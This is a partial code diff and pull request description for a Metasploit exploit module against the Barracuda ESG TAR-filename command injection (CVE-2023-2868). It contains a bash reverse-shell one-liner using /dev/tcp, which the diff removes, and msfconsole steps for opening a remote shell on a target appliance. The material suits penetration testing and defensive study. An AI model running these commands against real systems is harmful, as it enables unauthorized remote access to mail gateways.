-  def default_cmd
-    "bash -i >& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1"
   end
 
   def check
@@ -129,20 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    # Determine command to execute - use CMD if set, otherwise default bash command
-    cmd = datastore['CMD'].to_s.strip
-
-    if cmd.empty? || cmd == 'AUTO'
-      cmd = default_cmd
-    end
-
-    # Validate payload doesn't contain breaking characters
-    if cmd.include?("'")
-      fail_with(Failure::BadConfig, 'Command contains single quotes which break the exploit. Use the default command or cmd/unix/reverse_netcat')
-    end
-    if cmd.include?('`')
-      fail_with(Failure::BadConfig, 'Command contains backticks which break the exploit. Use the default command or cmd/unix/reverse_netcat')
-    end
+    cmd = payload.encoded
 
     # Wrap payload in critical format for command injection:
     # Outer single quotes prevent immediate shell parsing,

--- a/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'Mandiant',          # Discovery and analysis
-          'Rapid7',            # Original PoC
+          'cfielding-r7',            # Original PoC
           'Curt Hyvarinen'     # Metasploit module
         ],
         'References' => [


### PR DESCRIPTION
## Summary

Adds exploit module for CVE-2023-2868, a command injection vulnerability in Barracuda Email Security Gateway (ESG) appliances. Filenames in TAR attachments are passed to shell commands without sanitization, allowing RCE via backtick injection.

Tested against physical Barracuda ESG 300 appliance with native MSF session.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/handler`
- [ ] `set PAYLOAD generic/shell_reverse_tcp`
- [ ] `set LHOST <your_ip>`
- [ ] `set LPORT 4444`
- [ ] `run -j`
- [ ] `use exploit/linux/smtp/barracuda_esg_tarfile_rce`
- [ ] `set RHOSTS <target_esg>`
- [ ] `set MAILTO <valid_email_on_esg>`
- [ ] `set LHOST <your_ip>`
- [ ] `set LPORT 4444`
- [ ] `run`
- [ ] **Verify** email is sent successfully
- [ ] **Verify** session opens after 30-90 seconds (amavisd processing delay)
- [ ] **Verify** invalid payloads (single quotes, backticks) fail with clear error
- [ ] **Document** included at `documentation/modules/exploit/linux/smtp/barracuda_esg_tarfile_rce.md`

## Testing

Tested on physical Barracuda ESG 300 appliance. Screenshot attached showing exploit execution and native MSF session.

<img width="1568" height="608" alt="Screenshot 2026-02-27 232028" src="https://github.com/user-attachments/assets/0b0d09c0-8923-4e19-9d7d-dbe0c18eab68" />


This falls under "specific hardware" - email security appliances aren't easy to come by. Happy to provide pcap or additional demonstration if needed.